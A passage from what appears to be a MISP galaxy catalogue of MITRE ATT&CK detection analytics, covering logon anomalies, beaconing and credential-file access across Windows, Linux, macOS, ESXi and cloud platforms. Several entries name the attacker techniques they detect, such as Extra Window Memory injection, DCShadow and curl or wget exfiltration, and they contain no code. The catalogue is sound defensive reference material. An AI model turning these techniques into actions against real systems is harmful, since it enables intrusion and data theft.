Detection of suspicious logon behavior using valid domain accounts across multiple hosts, off-hours, or simultaneous sessions from geographically distant locations.

Internal MISP references

UUID c7706ddb-cf88-41c7-981b-a5e1bf6cfcfc which can be used as unique global reference for Analytic 0590 - AN0590 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0590
mitre_platforms ['Windows']

Analytic 0509 - AN0509

Group membership checks via 'dscl', 'dscacheutil', or 'id', typically executed via terminal or automation scripts.

Internal MISP references

UUID ef8fa56d-882e-42da-990e-2adc3a771041 which can be used as unique global reference for Analytic 0509 - AN0509 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0509
mitre_platforms ['macOS']

Analytic 0606 - AN0606

Encryption of cloud storage objects (e.g., S3 buckets) via Server-Side Encryption (SSE-C) or by replacing objects with encrypted variants. May include API patterns like PutObject with SSE-C headers.

Internal MISP references

UUID 57d8fd27-9af5-4d01-9d1a-fdde8ec0c902 which can be used as unique global reference for Analytic 0606 - AN0606 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0606
mitre_platforms ['IaaS']

Analytic 0660 - AN0660

Detection of changes to /etc/rc.local.d/local.sh or rc.local during post-boot script execution with abnormal commands or additions.

Internal MISP references

UUID 69562961-14e6-42a7-9f8a-24ac00f6404e which can be used as unique global reference for Analytic 0660 - AN0660 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0660
mitre_platforms ['ESXi']

Analytic 0066 - AN0066

Detection of unpacking behavior through abnormal memory allocation, followed by executable code injection and execution from non-image sections.

Internal MISP references

UUID e6a7eeb3-0652-460c-b68b-f17d2ed82822 which can be used as unique global reference for Analytic 0066 - AN0066 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0066
mitre_platforms ['Windows']

Analytic 0067 - AN0067

Correlates ELF file execution with high-entropy writable memory segments and self-modifying code patterns.

Internal MISP references

UUID 3cb4d3f4-df71-474c-a9f0-438dbf26bf66 which can be used as unique global reference for Analytic 0067 - AN0067 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0067
mitre_platforms ['Linux']

Analytic 0607 - AN0607

Detection focuses on unauthorized modification of Mach-O binaries to include LC_LOAD_DYLIB headers pointing to malicious dylibs. Behavior is identified via a chain of file metadata changes, removal of code signatures, and subsequent anomalous dylib loads at runtime. Correlation of file changes with lack of authorized updates and process memory mapping of unrecognized or unsigned libraries is crucial.

Internal MISP references

UUID 7aaf568b-bc31-4fb0-8543-12ee281a0b85 which can be used as unique global reference for Analytic 0607 - AN0607 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0607
mitre_platforms ['macOS']

Analytic 0670 - AN0670

Detection of syslog configuration tampering using esxcli system syslog config set or reload. Defender correlates command execution with absence of syslog forwarding activity.

Internal MISP references

UUID b3828af6-912b-493b-b621-3448a8f07972 which can be used as unique global reference for Analytic 0670 - AN0670 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0670
mitre_platforms ['ESXi']

Analytic 0076 - AN0076

Detects curl, wget, Python requests, or custom HTTP clients communicating over non-standard ports, with repetitive or beacon-like patterns or POST-heavy behavior to rare domains.

Internal MISP references

UUID cba23232-7fae-47df-bd83-0ca5a5066373 which can be used as unique global reference for Analytic 0076 - AN0076 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0076
mitre_platforms ['Linux']

Analytic 0706 - AN0706

Monitor for suspicious use of commands such as cat, less, grep, or journalctl accessing /var/log/ files. Abnormal enumeration of authentication logs (auth.log, secure) or bulk access to multiple logs in short time windows should be flagged.

Internal MISP references

UUID ee468e26-d179-47ba-af8b-43118db24939 which can be used as unique global reference for Analytic 0706 - AN0706 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0706
mitre_platforms ['Linux']

Analytic 0760 - AN0760

Processes like curl, wget, python, socat, or custom binaries initiating TLS/SSL sessions to non-standard destinations. Defender sees abnormal syscalls for connect(), loading of libssl libraries, and persistent outbound encrypted traffic from daemons not normally communicating externally.

Internal MISP references

UUID f0dacfba-bcc0-43cb-bad5-0cd3fe3a7f5f which can be used as unique global reference for Analytic 0760 - AN0760 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0760
mitre_platforms ['Linux']

Analytic 0068 - AN0068

Detection of packed Mach-O binaries unpacking into memory and transferring control to dynamically modified code segments.

Internal MISP references

UUID 003c2ca3-a9a8-4a56-9163-f6733f19b41d which can be used as unique global reference for Analytic 0068 - AN0068 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0068
mitre_platforms ['macOS']

Analytic 0860 - AN0860

Access to local credential/config files (e.g., ~/.aws/credentials) followed by metadata API calls or cloud role assumptions.

Internal MISP references

UUID 01d19202-019e-43c9-a5e9-e1e2a38eb738 which can be used as unique global reference for Analytic 0860 - AN0860 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0860
mitre_platforms ['IaaS']

Analytic 0680 - AN0680

Unusual or excessive database/table exports from SaaS database platforms (e.g., Snowflake, Firebase, BigQuery, Airtable) by users or apps not in known analytics or dev groups. Defender observes access patterns outside baseline working hours or with new query templates, and correlates those with audit logs or file downloads.

Internal MISP references

UUID 544c832f-4849-4fb7-a851-5f69ec0692a9 which can be used as unique global reference for Analytic 0680 - AN0680 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0680
mitre_platforms ['SaaS']

Analytic 0608 - AN0608

Detects adversary manipulation of Extra Window Memory (EWM) in a GUI process, where the attacker uses SetWindowLong or SetClassLong to redirect function pointers to injected shellcode stored in shared memory, then triggers execution via a window message like SendNotifyMessage.

Internal MISP references

UUID 6ec034ac-289d-48d1-b310-021dfbf7087b which can be used as unique global reference for Analytic 0608 - AN0608 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0608
mitre_platforms ['Windows']

Analytic 0086 - AN0086

Outlook form execution upon message receipt or client launch results in automated code execution within the user session. Form definitions deviate from standard templates and include script logic or COM object calls embedded in form fields.

Internal MISP references

UUID 73ec21b3-5679-44a9-bac3-943060bed786 which can be used as unique global reference for Analytic 0086 - AN0086 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0086
mitre_platforms ['Office Suite']

Analytic 0806 - AN0806

Detects crontab job additions or modifications via crontab utility or direct edits, especially those created by interactive users executing hidden or renamed scripts.

Internal MISP references

UUID 8a764f0e-4bcd-413d-bbf0-1a10cb98b598 which can be used as unique global reference for Analytic 0806 - AN0806 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0806
mitre_platforms ['macOS']

Analytic 0609 - AN0609

Unusual modifications to service binary paths, registry keys, or DLL load paths resulting in alternate execution flow. Defender observes registry key modifications, suspicious file writes into system directories, and processes loading libraries from abnormal paths.

Internal MISP references

UUID 248be939-35f5-4c8a-9e21-b6de514da577 which can be used as unique global reference for Analytic 0609 - AN0609 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0609
mitre_platforms ['Windows']

Analytic 0069 - AN0069

Detects unauthorized access, copying, or modification of Kerberos ccache files (krb5cc_%UID% or krb5.ccache) in /tmp or custom paths defined by KRB5CCNAME. Correlates file access with suspicious processes (e.g., credential dumping tools) and subsequent anomalous Kerberos authentication requests from non-standard processes.

Internal MISP references

UUID 3651d7d0-dfc7-4b36-aaf2-4eb0eb39167d which can be used as unique global reference for Analytic 0069 - AN0069 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0069
mitre_platforms ['Linux']

Analytic 0096 - AN0096

Detects execution of common process enumeration utilities (e.g., ps, top, htop) or access to /proc with suspicious ancestry. Correlates command usage with interactive shell context and user role.

Internal MISP references

UUID 59aedd87-8373-45d3-93e3-5697e4cc7a48 which can be used as unique global reference for Analytic 0096 - AN0096 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0096
mitre_platforms ['Linux']

Analytic 0690 - AN0690

Detects creation of cloud instances, services, or resources in normally unused or unsupported regions, especially following initial account access or credential use from known regions. Correlates resource provisioning across regions with absence of historical usage and alerting from standard logging services (e.g., GuardDuty not enabled in that region).

Internal MISP references

UUID 5d4419cc-6925-4f7d-a247-e0a4634fea90 which can be used as unique global reference for Analytic 0690 - AN0690 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0690
mitre_platforms ['IaaS']

Analytic 0960 - AN0960

Use of instance metadata tokens across instances or misuse of short-lived tokens issued for different roles.

Internal MISP references

UUID 91681b37-7fc7-418c-b4fd-35bebe1d151e which can be used as unique global reference for Analytic 0960 - AN0960 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0960
mitre_platforms ['IaaS']

Analytic 0906 - AN0906

Detects shell or API usage of esxcli network ip connection list or netstat to enumerate ESXi host connections.

Internal MISP references

UUID d42c2a80-bf02-460f-b279-147940ece3a9 which can be used as unique global reference for Analytic 0906 - AN0906 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0906
mitre_platforms ['ESXi']

Analytic 0770 - AN0770

Detection of rogue Domain Controller registration and Active Directory replication abuse by correlating: (1) creation/modification of nTDSDSA and server objects in the Configuration partition, (2) unexpected usage of Directory Replication Service SPNs (GC/ or E3514235-4B06-11D1-AB04-00C04FC2DCD2), (3) replication RPC calls (DrsAddEntry, DrsReplicaAdd, GetNCChanges) originating from non-DC hosts, and (4) Kerberos authentication by non-DC machines using DRS-related SPNs. These events in combination, especially from hosts outside the Domain Controllers OU, may indicate DCShadow or rogue DC activity.

Internal MISP references

UUID 34fecfa5-24fb-46c1-955f-68ecd4cc402c which can be used as unique global reference for Analytic 0770 - AN0770 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0770
mitre_platforms ['Windows']

Analytic 0077 - AN0077

Detects applications such as Automator, AppleScript, or LaunchDaemons invoking HTTP/S traffic to non-standard domains or using suspicious headers (e.g., Base64 in URIs or cookie fields).

Internal MISP references

UUID 5ff3ae40-d326-4eae-9bc5-c77ddcb6cb6e which can be used as unique global reference for Analytic 0077 - AN0077 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0077
mitre_platforms ['macOS']

Analytic 0707 - AN0707

Detect abnormal access to unified logs via log show or fs_usage targeting system log files. Monitor for execution of shell utilities (cat, grep) against /var/log/system.log and for plist modifications enabling verbose logging.

Internal MISP references

UUID 8f998965-ad70-4ec6-8bc1-85831edc0497 which can be used as unique global reference for Analytic 0707 - AN0707 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0707
mitre_platforms ['macOS']

Analytic 0078 - AN0078

Detects HTTP or HTTPS communication initiated by shell-based scripts or management daemons, especially those reaching public IPs over ports 80/443 using embedded curl or wget.

Internal MISP references

UUID 38205f16-18da-4d04-ae54-f5143b75c938 which can be used as unique global reference for Analytic 0078 - AN0078 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0078
mitre_platforms ['ESXi']

Analytic 0807 - AN0807

Detects direct modification of crontab entries in /var/spool/cron/crontabs/root or /etc/rc.local.d/local.sh followed by execution of scripts linked to lateral movement or malware persistence.

Internal MISP references

UUID 3ea6b02e-47e0-4815-9190-4e95eb51e779 which can be used as unique global reference for Analytic 0807 - AN0807 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0807
mitre_platforms ['ESXi']

Analytic 0708 - AN0708

Monitor for cloud API calls that export or collect guest or system logs. Abnormal use of Azure VM Agent’s CollectGuestLogs.exe or AWS CloudWatch GetLogEvents across multiple instances should be correlated with lateral movement or data staging.

Internal MISP references

UUID 42bae633-1033-40da-bf3a-87bcd1b0297f which can be used as unique global reference for Analytic 0708 - AN0708 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0708
mitre_platforms ['IaaS']

Analytic 0780 - AN0780

Monitor launchd service definitions and property list (.plist) modifications for non-standard executables. Detect unauthorized processes registered as launch daemons or agents.

Internal MISP references

UUID 63d21290-b858-4c4e-9447-31d623048048 which can be used as unique global reference for Analytic 0780 - AN0780 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0780
mitre_platforms ['macOS']

Analytic 0087 - AN0087

Detects modifications to IAM conditions or policies that alter authentication behavior, such as adding permissive trusted IPs, removing MFA requirements, or changing regional access restrictions. Behavioral detection focuses on anomalous policy updates tied to privileged accounts and subsequent suspicious logon activity from previously blocked regions or devices.

Internal MISP references

UUID b88f87d2-4a64-44a2-937e-85a929203843 which can be used as unique global reference for Analytic 0087 - AN0087 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0087
mitre_platforms ['IaaS']

Analytic 0870 - AN0870

Detection of fake or spoofed macOS Security & Privacy GUIs showing healthy status after XProtect, Gatekeeper, or AV processes are disabled. Correlates user-space UI process creation with terminated or missing security daemons.

Internal MISP references

UUID d9eb3056-115b-496a-89f7-be38470ff022 which can be used as unique global reference for Analytic 0870 - AN0870 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0870
mitre_platforms ['macOS']

Analytic 0079 - AN0079

Detects Web protocol misuse such as encoded HTTP headers, WebSocket upgrade requests with abnormal payloads, or TLS handshake anomalies suggesting embedded C2 channels.

Internal MISP references

UUID 1f1ed319-a6f9-4f30-9254-e0b1927a6bd9 which can be used as unique global reference for Analytic 0079 - AN0079 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0079
mitre_platforms ['Network Devices']

Analytic 0790 - AN0790

ESXi services (vmx, hostd) generating outbound HTTPS POST requests to text storage sites. Defender perspective: anomalous datastore or log reads chained with traffic to pastebin-like destinations.

Internal MISP references

UUID 58a609cb-b266-4a1a-a40f-9e4cd5d591ce which can be used as unique global reference for Analytic 0790 - AN0790 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0790
mitre_platforms ['ESXi']

Analytic 0097 - AN0097

Monitors execution of ps, top, or launchctl with unusual parent processes or from terminal scripts. Also detects AppleScript-based process listing or system_profiler SPApplicationsDataType misuse.

Internal MISP references

UUID 80939714-6d17-4cc0-accd-3e1d634846bc which can be used as unique global reference for Analytic 0097 - AN0097 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0097
mitre_platforms ['macOS']

Analytic 0970 - AN0970

Kernel or userland processes generating high-rate network traffic (ICMP, UDP, TCP SYN) beyond expected interface throughput or user behavior norms.

Internal MISP references

UUID a94c1081-d66b-4009-95a9-247721fcd394 which can be used as unique global reference for Analytic 0970 - AN0970 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0970
mitre_platforms ['Linux']

Analytic 0907 - AN0907

Detects interactive or automated use of CLI commands like show ip sockets, show tcp brief, or SNMP queries for active sessions on routers/switches.

Internal MISP references

UUID c6208aa1-fa6e-4d9d-a284-dd0aab1ee31c which can be used as unique global reference for Analytic 0907 - AN0907 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0907
mitre_platforms ['Network Devices']

Analytic 0709 - AN0709

Monitor ESXi shell or API access to host logs under /var/log/. Abnormal enumeration of vmkernel.log, hostd.log, or vpxa.log by unauthorized accounts should be flagged.

Internal MISP references

UUID f5b9ad98-3a10-4ff3-9e25-890488253bef which can be used as unique global reference for Analytic 0709 - AN0709 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0709
mitre_platforms ['ESXi']

Analytic 0880 - AN0880

Adversaries create the 'Office Test\Special\Perf' registry key and specify a malicious DLL path that is auto-loaded when an Office application starts. This DLL is injected into the Office process memory space and can provide persistent execution without requiring macro enablement.

Internal MISP references

UUID 80be1bd7-b4e8-4d1b-b294-56b1c073bbe0 which can be used as unique global reference for Analytic 0880 - AN0880 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0880
mitre_platforms ['Windows']

Analytic 0088 - AN0088

Detects suspicious updates to conditional access or MFA enforcement policies in identity providers such as Entra ID, Okta, or JumpCloud. Focus is on removal of policy blocks, addition of broad exclusions, or registration of adversary-controlled MFA methods, followed by anomalous login activity that takes advantage of the modified policies.

Internal MISP references

UUID 9eb2a081-e252-4009-a16e-90c9a85f70f1 which can be used as unique global reference for Analytic 0088 - AN0088 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0088
mitre_platforms ['Identity Provider']

Analytic 0808 - AN0808

Detects web console login events followed by read-only or metadata retrieval activity from GUI sources (e.g., browser session, mobile client) rather than API/CLI sources. Correlates across CloudTrail, IAM identity logs, and user-agent context.

Internal MISP references

UUID c8a50f3f-105a-4107-9781-a3d75479e93d which can be used as unique global reference for Analytic 0808 - AN0808 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0808
mitre_platforms ['IaaS']

Analytic 0809 - AN0809

Detects successful login to cloud identity portals (e.g., Okta, Azure AD, Google Identity) from atypical geolocations, devices, or user agents immediately followed by dashboard/portal navigation to sensitive pages such as user or app configuration.

Internal MISP references

UUID 041c0b93-fda4-478f-b847-d10619db729c which can be used as unique global reference for Analytic 0809 - AN0809 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0809
mitre_platforms ['Identity Provider']

Analytic 0980 - AN0980

Unusual use of screen capture APIs (e.g., CopyFromScreen) or command-line tools to write image files to disk.

Internal MISP references

UUID 20e00aff-6389-4c8a-8e38-3b63924e1612 which can be used as unique global reference for Analytic 0980 - AN0980 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0980
mitre_platforms ['Windows']

Analytic 0098 - AN0098

Detects process enumeration using esxcli system process list or ps on ESXi shell or via unauthorized SSH sessions. Correlates with interactive sessions and abnormal user roles.

Internal MISP references

UUID 7e029a7f-beb5-4da9-9d75-8fcfc812103b which can be used as unique global reference for Analytic 0098 - AN0098 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0098
mitre_platforms ['ESXi']

Analytic 0908 - AN0908

Detects enumeration of cloud network interfaces, VPCs, subnets, or peer connections using CLI or SDKs (e.g., AWS CLI, Azure CLI, GCloud CLI).

Internal MISP references

UUID 914a5b13-5977-4e62-abab-9ee03e72624f which can be used as unique global reference for Analytic 0908 - AN0908 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0908
mitre_platforms ['IaaS']

Analytic 0089 - AN0089

Execution of binaries with invalid digital signatures, where metadata claims code is signed but validation fails. Behavior is often correlated with suspicious parent processes or unexpected execution paths.

Internal MISP references

UUID bf6b3f42-a7a5-4e6d-840a-e892aa74916c which can be used as unique global reference for Analytic 0089 - AN0089 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0089
mitre_platforms ['Windows']

Analytic 0890 - AN0890

Unusual ESXi shell commands disabling syslog forwarding or stopping hostd/vpxa daemons. Detect modifications to firewall rules on ESXi host or disabling of lockdown mode.

Internal MISP references

UUID d2762796-1dea-448a-970a-7aeb176aa668 which can be used as unique global reference for Analytic 0890 - AN0890 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0890
mitre_platforms ['ESXi']

Analytic 0990 - AN0990

Detects unauthorized applications or scripts accessing sensitive data followed by establishing encrypted outbound communication to rare external destinations or with abnormal byte ratios.

Internal MISP references

UUID deb57305-6324-404d-a9d0-00aa0c285920 which can be used as unique global reference for Analytic 0990 - AN0990 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0990
mitre_platforms ['macOS']

Analytic 0099 - AN0099

Monitors CLI-based execution of show process or equivalent on routers/switches. Correlates unusual device access, unauthorized roles, or config mode changes.

Internal MISP references

UUID f6985c70-6de1-4600-aba0-5b3324184dce which can be used as unique global reference for Analytic 0099 - AN0099 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0099
mitre_platforms ['Network Devices']

Analytic 0909 - AN0909

Unusual execution of virtualization binaries (VBoxManage.exe, vmware-vmx.exe, vmwp.exe) with headless or suppressed notification arguments. Registry and service modifications linked to virtualization installs. Defender view: anomalies in process creation, service metadata, and registry writes tied to enabling hidden VMs.

Internal MISP references

UUID f94e2ae3-7c79-4796-96a1-e462828f9c13 which can be used as unique global reference for Analytic 0909 - AN0909 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0909
mitre_platforms ['Windows']

Analytic 0111 - AN0111

Inspect unified logs for anomalous DNS resolutions triggered by non-network applications. Flag repeated connections to newly registered or algorithmically generated domains. Correlate with endpoint process telemetry.

Internal MISP references

UUID 5e225927-bf50-4261-b1ae-d65e803da0b8 which can be used as unique global reference for Analytic 0111 - AN0111 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0111
mitre_platforms ['macOS']

Analytic 1101 - AN1101

Adversary invokes 'dpkg -l', 'rpm -qa', or other package managers via shell or script to enumerate installed software.

Internal MISP references

UUID c14042f6-5ebd-42a2-b293-b2367b300fb6 which can be used as unique global reference for Analytic 1101 - AN1101 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1101
mitre_platforms ['Linux']

Analytic 1011 - AN1011

Monitor unified logs and Mail.app activity for repetitive incoming messages with attachments. Defenders should look for large volumes of incoming mail stored under ~/Library/Mail with unusual timing or repetitive subjects.

Internal MISP references

UUID d41cdfc1-2a82-4442-a1ca-177fe59b8dff which can be used as unique global reference for Analytic 1011 - AN1011 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1011
mitre_platforms ['macOS']

Analytic 1110 - AN1110

Web servers (e.g., httpd) spawning abnormal processes after a file upload into /Library/WebServer/Documents or /usr/local/var/www.

Internal MISP references

UUID e5a0bbf3-e5d0-41f1-b757-c67eccece77b which can be used as unique global reference for Analytic 1110 - AN1110 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1110
mitre_platforms ['macOS']

Analytic 0121 - AN0121

Detection of system calls or commands accessing system locale (e.g., 'defaults read -g AppleLocale', 'systemsetup -gettimezone'). Correlate with unusual parent processes or execution contexts.

Internal MISP references

UUID 0521835b-bc02-41ed-8e6a-153e6422ee9c which can be used as unique global reference for Analytic 0121 - AN0121 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0121
mitre_platforms ['macOS']

Analytic 0211 - AN0211

Detects abuse of Mono/.NET Core environments to execute VB-like scripts, often in environments with Office emulation or WINE. Focus is on rare invocations of scripting hosts like mono.exe or .NET shells, often seen in spam filtering or forensic labs with Office support.

Internal MISP references

UUID 08318de4-1327-48ac-a686-403162d3891f which can be used as unique global reference for Analytic 0211 - AN0211 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0211
mitre_platforms ['Linux']

Analytic 1021 - AN1021

Tools such as tor, nglite, proxychains, chisel, or custom daemons repeatedly initiate outbound sessions to multiple nodes before reaching the final destination. This behavior is abnormal for Linux services outside of VPN, monitoring, or CDN relay contexts.

Internal MISP references

UUID 2416a634-3ad9-4f91-a894-8fb0d9d83b76 which can be used as unique global reference for Analytic 1021 - AN1021 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1021
mitre_platforms ['Linux']

Analytic 1201 - AN1201

Detects attempts to access or enumerate cloud password/secrets storage services such as AWS Secrets Manager, Azure Key Vault, or GCP Secret Manager. Monitors API calls for abnormal enumeration or bulk retrieval of secrets.

Internal MISP references

UUID 2c8326bd-dd59-4715-87ef-dc3bdef919fb which can be used as unique global reference for Analytic 1201 - AN1201 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1201
mitre_platforms ['IaaS']

Analytic 0112 - AN0112

Monitor esxcli and syslog records for DNS resolver changes or repeated queries to unusual external domains by management agents. Detect unauthorized changes to VM or host network settings that redirect DNS lookups.

Internal MISP references

UUID 3166927d-91e4-4e08-bfec-abda2783be8c which can be used as unique global reference for Analytic 0112 - AN0112 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0112
mitre_platforms ['ESXi']

Analytic 1210 - AN1210

Detection centers on DYLD_INSERT_LIBRARIES and DYLD_LIBRARY_PATH abuse. Defender perspective: monitor for modification of these environment variables in shell or plist files, file creation of dylibs in user-controlled paths, and correlation of environment variable usage with unexpected module loads by user applications. Suspicious indicators include processes with DYLD_INSERT_LIBRARIES set, execution of applications loading untrusted dylibs, and anomalies in module load history.

Internal MISP references

UUID 5907bfc2-a5d6-4ff1-bba8-8b94c9835ed6 which can be used as unique global reference for Analytic 1210 - AN1210 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1210
mitre_platforms ['macOS']

Analytic 1120 - AN1120

LaunchAgent or launchd recurring jobs initiating data transfer to consistent external IPs or domains with repeat timing signatures.

Internal MISP references

UUID 837bd639-c291-4e42-b737-6a21d6bf8fd5 which can be used as unique global reference for Analytic 1120 - AN1120 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1120
mitre_platforms ['macOS']

Analytic 1102 - AN1102

Adversary runs 'system_profiler SPApplicationsDataType' or queries plist files to enumerate software via Terminal or scripts.

Internal MISP references

UUID a1619e8f-10aa-46ab-8776-898e8c3d5b43 which can be used as unique global reference for Analytic 1102 - AN1102 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1102
mitre_platforms ['macOS']

Analytic 2011 - AN2011

Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during exfiltration (ex: Transfer Data to Cloud Account).

Internal MISP references

UUID cce3f1e3-a688-4519-bd9b-0ec5ba57bc11 which can be used as unique global reference for Analytic 2011 - AN2011 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN2011
mitre_platforms ['PRE']

Analytic 1012 - AN1012

Burst of incomplete TCP handshakes (e.g., SYN floods) or uncorrelated ACK packets targeting the state table resulting in OS resource exhaustion.

Internal MISP references

UUID cecfe3bc-525a-431e-8ee1-5133ab8ce79c which can be used as unique global reference for Analytic 1012 - AN1012 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1012
mitre_platforms ['Windows']

Analytic 1031 - AN1031

Detects adversarial abuse of WMI to execute local or remote commands via WMIC, PowerShell, or COM API through a multi-event chain: process creation, command execution, and corresponding network connection if remote.

Internal MISP references

UUID 17687fa0-bfbf-4ff2-9eb0-520538e6af31 which can be used as unique global reference for Analytic 1031 - AN1031 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1031
mitre_platforms ['Windows']

Analytic 1103 - AN1103

Adversary uses cloud-native APIs or CLI (e.g., AWS Systems Manager, Azure Resource Graph) to list installed software on cloud workloads.

Internal MISP references

UUID 3ccd6662-c579-494f-bbfa-ffc3530e3db2 which can be used as unique global reference for Analytic 1103 - AN1103 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1103
mitre_platforms ['IaaS']

Analytic 1301 - AN1301

Detects upload of malicious or unusual file types into cloud-shared folders, followed by user downloads or interactions.

Internal MISP references

UUID 49e91c60-9b73-4a0a-9510-f94152a8ba5e which can be used as unique global reference for Analytic 1301 - AN1301 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1301
mitre_platforms ['SaaS']

Analytic 0113 - AN0113

Detects adversary activity that removes persistence artifacts such as services, registry keys, scheduled tasks, user accounts, and binaries through commands like sc delete, schtasks /delete, or reg delete.

Internal MISP references

UUID 5882d2ff-289e-454d-9146-81306c154be3 which can be used as unique global reference for Analytic 0113 - AN0113 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0113
mitre_platforms ['Windows']

Analytic 0311 - AN0311

Monitoring modification and execution of user or system logon scripts such as in registry Run keys or startup folders.

Internal MISP references

UUID 682bd971-c540-4c16-a25a-b928201a320d which can be used as unique global reference for Analytic 0311 - AN0311 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0311
mitre_platforms ['Windows']

Analytic 1130 - AN1130

Discovery of connected SaaS applications, APIs, or configurations within platforms like Salesforce, Slack, or Zoom. Defender perspective includes enumeration of available integrations, abnormal querying of service metadata, and follow-on attempts to exploit or persist via discovered services.

Internal MISP references

UUID a0730d9f-0a05-4153-8c6a-6f04f9f7346c which can be used as unique global reference for Analytic 1130 - AN1130 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1130
mitre_platforms ['SaaS']

Analytic 1310 - AN1310

Detects file access to mbox/maildir files in conjunction with curl/wget/postfix execution, or anomalous shell scripts harvesting user mail directories.

Internal MISP references

UUID ba43428d-b5d2-4815-a614-42ff1ea816a9 which can be used as unique global reference for Analytic 1310 - AN1310 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1310
mitre_platforms ['Linux']

Analytic 0131 - AN0131

